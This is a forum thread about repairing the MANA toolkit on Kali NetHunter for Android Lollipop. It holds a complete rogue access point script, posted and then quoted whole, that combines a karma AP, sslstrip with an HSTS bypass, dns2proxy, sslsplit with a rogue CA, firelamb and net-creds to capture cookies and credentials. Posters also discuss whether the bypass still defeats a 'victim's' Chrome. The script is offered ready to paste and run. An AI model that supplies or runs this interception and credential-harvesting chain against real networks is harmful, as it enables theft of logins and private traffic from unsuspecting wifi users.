Mana issues on Nethunter 2.0 / Lollipop

[stinkybit]

Hi guys,

I'm having issues with mana and Nethunter 2.0 on Lollipop.
Mana kind of starts and I can connect to the AP but connections are not being forwarded and as far as I can see, the sslstrip process is not running and "iptables -L -n -v" looks pretty generic without all the port forwards for sslstrip/sslsplit.

This applies to my opo as well as n7 2013 wifi. Booting the OPO into cm11s and NH 1.1 with multirom, it all looks fine.

Any Ideas? Anyone else having this trouble?

[stinkybit]

as far as I can see, the sslstrip process is not running

At least this part I could solve for myself so far:

in /usr/share/mana-toolkit/run-mana/start-nat-full-lollipop.sh you first

Code:

cd /usr/share/mana-toolkit/sslstrip-hsts/

and then execute the two python scripts:

Code:

python sslstrip.py...
python dns2proxy.py...

..which are not in this location. I changed the script to:

Code:

python sslstrip2/sslstrip.py...
python dns2proxy/dns2proxy.py...

[mehmut]

Having the exact same problem (nexus 7 2012 wifi, lollipop). I wonder if this is lollipop related and we can restore mana's upstream by downgrading to kitkat and using the dedicated kitkat scripts in the "run-mana" folder.

[simonpunk2016]

Hi, I think I just fixed this issue, like stinkybit said, it's all about the wrong path setting in start-nat-full-lollipop.sh
just change the following script

cd /usr/share/mana-toolkit/sslstrip-hsts/
python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
python dns2proxy.py $phy&
cd -

to

cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
python dns2proxy.py -i $phy&
cd -

and now you should be able to run the script properly.
However, seems the hsts bypass not working good, the first time the client can be directed to wwww.google.com by typing www.google.com in the url, as well as the wwww.gmail.com , but when I clicked login, it came to error page.....and when I tried again typing www.google.com, it failed going to wwww.google.com.
So, maybe is this not working anymore? or need to modify the script? as I don't know how to....

[muts]

Thanks for the update. This has been verified and fixed in https://github.com/offensive-securit...2c9dfc42e5394d and will be available in the next upcoming release.

[stinkybit]

Thanks to simonpunk2016 - the second cd-command does a better job than calling the scripts with a relative path as I tried it.

@muts:
simonpunk also suggested to call dns2proxy.py with "-i" in front of the interface, which also seems correct to me. This might be fixed as well.

[simonpunk2016]

You are welcome, but seems the latest google chrome version has defected the hsts bypass from MITMf, I would like to know if you have succeeded to spoof the victim that using latest google chrome version on different OS. In my case, the victim's chrome can detect my attack and prevent victim from browsing any website.

[stinkybit]

I just tried it with the latest chrome version on android and had the following behaviour (same as with fennec, btw):

http sites are browseable as usual.
if I browse sites like google.com they fall back to http as long as I don't write "https" explicitly.
(forced) https-sites give me a warning regarding an untrusted certificate.

But your problem looks familiar, I think, I had it before - maybe on my windows laptop, but unfortunately can't test it right now.

[patryq9603]

HI guys I just repair this and now it works perfect
here is moded script
copy and paste it to /usr/share/mana-toolkit/run-mana/start-nat-full-lollipop.sh

#!/bin/bash
upstream=wlan0
phy=wlan1
conf=/etc/mana-toolkit/hostapd-karma.conf
hostapd=/usr/lib/mana-toolkit/hostapd

echo '1' > /proc/sys/net/ipv4/ip_forward
rfkill unblock wlan
echo -- $phy: flushing interface --
ip addr flush dev $phy
echo -- $phy: setting ip --
ip addr add 10.0.0.1/24 dev $phy
echo -- $phy: starting the interface --
ip link set $phy up
echo -- $phy: setting route --
ip route add default via 10.0.0.1 dev $phy

# Starting AP and DHCP
sed -i "s/^interface=.*$/interface=$phy/" $conf
$hostapd $conf &
sleep 5
dhcpd -cf /etc/mana-toolkit/dhcpd.conf $phy
sleep 5

# Add fking rule to table 1006
for table in $(ip rule list | awk -F"lookup" '{print $2}');
do
DEF=`ip route show table $table|grep default|grep $upstream`
if ! [ -z "$DEF" ]; then
break
fi
done
ip route add 10.0.0.0/24 dev $phy scope link table $table

# RM quota from chains to avoid errors in iptable-save
# http://lists.netfilter.org/pipermail...er/002995.html
iptables -F bw_INPUT
iptables -F bw_OUTPUT
# Save
iptables-save > /tmp/rules.txt
# Flush
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT
iptables -F
iptables -F -t nat
# Masquerade
iptables -t nat -A POSTROUTING -o $upstream -j MASQUERADE
iptables -A FORWARD -i $phy -o $upstream -j ACCEPT
iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

#SSLStrip with HSTS bypass
cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
python dns2proxy.py -i $phy&
cd -

#SSLSplit
sslsplit -D -P -Z -S /var/lib/mana-toolkit/sslsplit -c /usr/share/mana-toolkit/cert/rogue-ca.pem -k /usr/share/mana-toolkit/cert/rogue-ca.key -O -l /var/lib/mana-toolkit/sslsplit-connect.log \
https 0.0.0.0 10443 \
http 0.0.0.0 10080 \
ssl 0.0.0.0 10993 \
tcp 0.0.0.0 10143 \
ssl 0.0.0.0 10995 \
tcp 0.0.0.0 10110 \
ssl 0.0.0.0 10465 \
tcp 0.0.0.0 10025&

# iptables -t nat -A INPUT -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10080
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -j REDIRECT --to-port 10443
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -j REDIRECT --to-port 10143
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -j REDIRECT --to-port 10993
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 65493 -j REDIRECT --to-port 10993
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -j REDIRECT --to-port 10465
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -j REDIRECT --to-port 10025
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -j REDIRECT --to-port 10995
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -j REDIRECT --to-port 10110

# Start FireLamb
/usr/share/mana-toolkit/firelamb/firelamb.py -i $phy &

# Start net-creeds
python /usr/share/mana-toolkit/net-creds/net-creds.py -i $phy > /var/lib/mana-toolkit/net-creds.log.

sleep 5

echo "Hit enter to kill me"
read
pkill dhcpd
pkill sslstrip
pkill sslsplit
pkill hostapd
pkill python
# Restore
iptables-restore < /tmp/rules.txt
rm /tmp/rules.txt
# Remove iface and routes
ip addr flush dev $phy
ip link set $phy down

[nexusnexus]

HI guys I just repair this and now it works perfect
here is moded script
copy and paste it to /usr/share/mana-toolkit/run-mana/start-nat-full-lollipop.sh

#!/bin/bash
upstream=wlan0
phy=wlan1
conf=/etc/mana-toolkit/hostapd-karma.conf
hostapd=/usr/lib/mana-toolkit/hostapd

echo '1' > /proc/sys/net/ipv4/ip_forward
rfkill unblock wlan
echo -- $phy: flushing interface --
ip addr flush dev $phy
echo -- $phy: setting ip --
ip addr add 10.0.0.1/24 dev $phy
echo -- $phy: starting the interface --
ip link set $phy up
echo -- $phy: setting route --
ip route add default via 10.0.0.1 dev $phy

# Starting AP and DHCP
sed -i "s/^interface=.*$/interface=$phy/" $conf
$hostapd $conf &
sleep 5
dhcpd -cf /etc/mana-toolkit/dhcpd.conf $phy
sleep 5

# Add fking rule to table 1006
for table in $(ip rule list | awk -F"lookup" '{print $2}');
do
DEF=`ip route show table $table|grep default|grep $upstream`
if ! [ -z "$DEF" ]; then
break
fi
done
ip route add 10.0.0.0/24 dev $phy scope link table $table

# RM quota from chains to avoid errors in iptable-save
# http://lists.netfilter.org/pipermail...er/002995.html
iptables -F bw_INPUT
iptables -F bw_OUTPUT
# Save
iptables-save > /tmp/rules.txt
# Flush
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT
iptables -F
iptables -F -t nat
# Masquerade
iptables -t nat -A POSTROUTING -o $upstream -j MASQUERADE
iptables -A FORWARD -i $phy -o $upstream -j ACCEPT
iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

#SSLStrip with HSTS bypass
cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
python dns2proxy.py -i $phy&
cd -

#SSLSplit
sslsplit -D -P -Z -S /var/lib/mana-toolkit/sslsplit -c /usr/share/mana-toolkit/cert/rogue-ca.pem -k /usr/share/mana-toolkit/cert/rogue-ca.key -O -l /var/lib/mana-toolkit/sslsplit-connect.log \
https 0.0.0.0 10443 \
http 0.0.0.0 10080 \
ssl 0.0.0.0 10993 \
tcp 0.0.0.0 10143 \
ssl 0.0.0.0 10995 \
tcp 0.0.0.0 10110 \
ssl 0.0.0.0 10465 \
tcp 0.0.0.0 10025&

# iptables -t nat -A INPUT -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10080
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -j REDIRECT --to-port 10443
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -j REDIRECT --to-port 10143
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -j REDIRECT --to-port 10993
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 65493 -j REDIRECT --to-port 10993
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -j REDIRECT --to-port 10465
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -j REDIRECT --to-port 10025
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -j REDIRECT --to-port 10995
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -j REDIRECT --to-port 10110

# Start FireLamb
/usr/share/mana-toolkit/firelamb/firelamb.py -i $phy &

# Start net-creeds
python /usr/share/mana-toolkit/net-creds/net-creds.py -i $phy > /var/lib/mana-toolkit/net-creds.log.

sleep 5

echo "Hit enter to kill me"
read
pkill dhcpd
pkill sslstrip
pkill sslsplit
pkill hostapd
pkill python
# Restore
iptables-restore < /tmp/rules.txt
rm /tmp/rules.txt
# Remove iface and routes
ip addr flush dev $phy
ip link set $phy down

Can i paste this in the nat-full section of mana on nethunter nexus 7 and click update?
new to all this :-/

EDIT: nevermind, got it sorted now :-)